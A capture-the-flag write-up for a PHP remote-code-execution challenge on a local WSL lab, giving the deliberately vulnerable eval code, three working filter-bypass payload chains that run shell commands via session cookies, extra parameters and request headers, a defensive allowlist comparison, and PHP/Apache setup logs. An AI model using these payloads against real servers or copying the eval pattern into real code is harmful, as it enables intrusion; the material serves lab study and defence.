RCE CTF Challenge: Environment Setup and Solution Walkthrough, Part 2

1 Deployed in an Ubuntu environment under WSL

2 Challenge

2.1 http://127.0.0.1/rce1/rce1.php

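<?php
if(isset($_GET['code'])){
    // [^\W]+ is \w+ (a function name); (?R) recurses into the parentheses,
    // so only calls whose sole argument is another such call, e.g. a(b(c()));, reduce to ';'.
    if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])){
        // Deliberately vulnerable: the request parameter is evaluated as PHP.
        eval($_GET['code']);
    }else{
        die('nonono');
    }
}else{
    highlight_file(__FILE__);
}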

3 EXP

3.1.1 code=phpinfo();

3.1.2 code=session_start();

3.1.3 code=var_dump(session_id(session_start()));

3.1.4 Hex-encode system("ls"); to get 73797374656d28226c7322293b

3.1.5 Replace the cookie value with the hex string

3.1.6 var_dump(hex2bin(session_id(session_start())));

3.1.7 eval(hex2bin(session_id(session_start())));

3.1.8 Hex-encode system("ls /"); to get 73797374656d28226c73202f22293b

3.1.9 The flag is visible

3.2.1 var_dump(get_defined_vars());

3.2.2 var_dump(current(get_defined_vars()));

3.2.3 var_dump(current(get_defined_vars()));&a=ls

3.2.4 var_dump(next(current(get_defined_vars())));&a=ls

3.2.5 system(next(current(get_defined_vars())));&a=ls

3.2.6 system(next(current(get_defined_vars())));&a=ls%20/

3.3.1 var_dump(getallheaders());

3.3.2 Add a request header Cmd: ls /

3.3.3 var_dump(end(getallheaders()));

3.3.4 system(end(getallheaders()));
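
The filter in section 2.1 checks only the shape of the input (nested calls with no literal arguments), not which functions are called, which is why every payload in section 3 passes it. The following added example (not from the original post; `shape_only_check`, `allowlisted_check` and the allowlist are hypothetical names) runs the challenge's check beside a variant that also allowlists function names, over payloads copied from section 3.

```php
<?php
// Added example, not part of the original challenge.
// Function names and the allowlist are hypothetical.

// The challenge's check: strip name(...) groups recursively; only ';' may remain.
function shape_only_check(string $code): bool {
    return ';' === preg_replace('/[^\W]+\((?R)?\)/', '', $code);
}

// Hardened variant: same shape check, plus every called name must be allowlisted.
// Not passing request data to eval() at all is the stronger fix; this only
// shows that the shape check by itself is not an access control.
function allowlisted_check(string $code, array $allowed): bool {
    if (!shape_only_check($code)) {
        return false;
    }
    // Every identifier directly followed by '(' is a function being called.
    preg_match_all('/\w+(?=\()/', $code, $m);
    foreach ($m[0] as $name) {
        // PHP function names are case-insensitive, so normalise first.
        if (!in_array(strtolower($name), $allowed, true)) {
            return false;
        }
    }
    return true;
}

$allowed = ['phpinfo'];  // hypothetical allowlist for this demo

// Inputs copied from section 3 of this page, plus one call with a literal argument.
$samples = [
    'phpinfo();',
    'eval(hex2bin(session_id(session_start())));',
    'system(next(current(get_defined_vars())));',
    'system(end(getallheaders()));',
    'system("ls");',
];

foreach ($samples as $code) {
    printf("%-50s shape=%-5s allowlist=%s\n",
        $code,
        var_export(shape_only_check($code), true),
        var_export(allowlisted_check($code, $allowed), true));
}
```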


4 Environment setup

4 Solution process

4.0.1 Install the PHP environment on Ubuntu under WSL

Step 1: Remove Existing PHP Versions

First, let’s clean up any existing PHP 7.x installations:

sudo apt-get purge php7.*
sudo apt-get autoclean
sudo apt-get autoremove

Note about these commands:

autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files

Step 2: Add the PHP Repository

Ondřej Surý maintains up-to-date PHP packages for Ubuntu:

sudo add-apt-repository ppa:ondrej/php
sudo apt-get update

Step 3: Install PHP 7.3

Now install PHP 7.3 and common extensions:

sudo apt-get install php7.3

Step 4: Configure Apache (if using Apache)

If you’re using Apache as your web server:

# Disable old PHP module (if any)
sudo a2dismod php7.0  # or whatever version you had before

# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache2

4.0.2 Give the regular user account read, write and execute permissions on /var/www/html

(base) gpu3090@DESKTOP-8IU6393:~$ chown  gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown  gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-应用集成  anaconda3  cookies.txt  downloads  snap  summaries  tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$

4.1 Switch to PHP 7.1

(base) gpu3090@DESKTOP-8IU6393:/$ sudo apt-get install php7.1
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  libapache2-mod-php7.1 libpcre3 php7.1-cli php7.1-common php7.1-json php7.1-opcache php7.1-readline
Suggested packages:
  php-pear
The following NEW packages will be installed:
  libapache2-mod-php7.1 libpcre3 php7.1 php7.1-cli php7.1-common php7.1-json php7.1-opcache php7.1-readline
0 upgraded, 8 newly installed, 0 to remove and 2 not upgraded.
Need to get 3997 kB of archives.
After this operation, 15.0 MB of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://archive.ubuntu.com/ubuntu noble/universe amd64 libpcre3 amd64 2:8.39-15build1 [248 kB]
Get:2 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-common amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [579 kB]
Get:3 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-json amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [19.4 kB]
Get:4 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-opcache amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [164 kB]
Get:5 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-readline amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [13.4 kB]
Get:6 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-cli amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [1489 kB]
Get:7 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 libapache2-mod-php7.1 amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [1418 kB]
Get:8 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1 all 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [66.0 kB]
Fetched 3997 kB in 55s (73.2 kB/s)
Selecting previously unselected package libpcre3:amd64.
(Reading database ... 43387 files and directories currently installed.)
Preparing to unpack .../0-libpcre3_2%3a8.39-15build1_amd64.deb ...
Unpacking libpcre3:amd64 (2:8.39-15build1) ...
Selecting previously unselected package php7.1-common.
Preparing to unpack .../1-php7.1-common_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-common (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-json.
Preparing to unpack .../2-php7.1-json_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-json (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-opcache.
Preparing to unpack .../3-php7.1-opcache_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-opcache (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-readline.
Preparing to unpack .../4-php7.1-readline_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-readline (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-cli.
Preparing to unpack .../5-php7.1-cli_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package libapache2-mod-php7.1.
Preparing to unpack .../6-libapache2-mod-php7.1_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1.
Preparing to unpack .../7-php7.1_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_all.deb ...
Unpacking php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Setting up libpcre3:amd64 (2:8.39-15build1) ...
Setting up php7.1-common (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/mods-available/calendar.ini with new version

Creating config file /etc/php/7.1/mods-available/ctype.ini with new version

Creating config file /etc/php/7.1/mods-available/exif.ini with new version

Creating config file /etc/php/7.1/mods-available/fileinfo.ini with new version

Creating config file /etc/php/7.1/mods-available/ftp.ini with new version

Creating config file /etc/php/7.1/mods-available/gettext.ini with new version

Creating config file /etc/php/7.1/mods-available/iconv.ini with new version

Creating config file /etc/php/7.1/mods-available/pdo.ini with new version

Creating config file /etc/php/7.1/mods-available/phar.ini with new version

Creating config file /etc/php/7.1/mods-available/posix.ini with new version

Creating config file /etc/php/7.1/mods-available/shmop.ini with new version

Creating config file /etc/php/7.1/mods-available/sockets.ini with new version

Creating config file /etc/php/7.1/mods-available/sysvmsg.ini with new version

Creating config file /etc/php/7.1/mods-available/sysvsem.ini with new version

Creating config file /etc/php/7.1/mods-available/sysvshm.ini with new version

Creating config file /etc/php/7.1/mods-available/tokenizer.ini with new version
Setting up php7.1-opcache (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/mods-available/opcache.ini with new version
Setting up php7.1-readline (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/mods-available/readline.ini with new version
Setting up php7.1-json (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/mods-available/json.ini with new version
Setting up php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/cli/php.ini with new version
Setting up libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/apache2/php.ini with new version
libapache2-mod-php7.1: php7.3 module already enabled, not enabling PHP 7.1
Setting up php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Processing triggers for libc-bin (2.39-0ubuntu8.5) ...
Processing triggers for man-db (2.12.0-4build2) ...
Processing triggers for php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Processing triggers for libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
(base) gpu3090@DESKTOP-8IU6393:/$ php -v
PHP 7.3.33-24+ubuntu24.04.1+deb.sury.org+1 (cli) (built: Dec 24 2024 07:05:25) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.33, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.3.33-24+ubuntu24.04.1+deb.sury.org+1, Copyright (c) 1999-2018, by Zend Technologies
(base) gpu3090@DESKTOP-8IU6393:/$ sudo update-alternatives --config php
There are 3 choices for the alternative php (providing /usr/bin/php).

  Selection    Path             Priority   Status
------------------------------------------------------------
  0            /usr/bin/php7.4   74        auto mode
  1            /usr/bin/php7.1   71        manual mode
* 2            /usr/bin/php7.3   73        manual mode
  3            /usr/bin/php7.4   74        manual mode

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/bin/php7.1 to provide /usr/bin/php (php) in manual mode
(base) gpu3090@DESKTOP-8IU6393:/$ php -v
PHP 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 (cli) (built: Dec 24 2024 06:50:54) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.1.0, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.1.33-67+ubuntu24.04.1+deb.sury.org+1, Copyright (c) 1999-2018, by Zend Technologies
(base) gpu3090@DESKTOP-8IU6393:/$ sudo systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$ sudo a2enmod php7.1
Considering dependency mpm_prefork for php7.1:
Considering conflict mpm_event for mpm_prefork:
Considering conflict mpm_worker for mpm_prefork:
Module mpm_prefork already enabled
Considering conflict php5 for php7.1:
Enabling module php7.1.
To activate the new configuration, you need to run:
  systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$ systemctl restart apache2
Failed to restart apache2.service: Interactive authentication required.
See system logs and 'systemctl status apache2.service' for details.
(base) gpu3090@DESKTOP-8IU6393:/$ sudo systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$

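4.0.3 Place the challenge code and the flag in the corresponding locations under /var/www/html/

4.1 Run the PHP scripts for the EXP above in VS Code

This requires installing the PHP Debug and PHP Server extensions.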
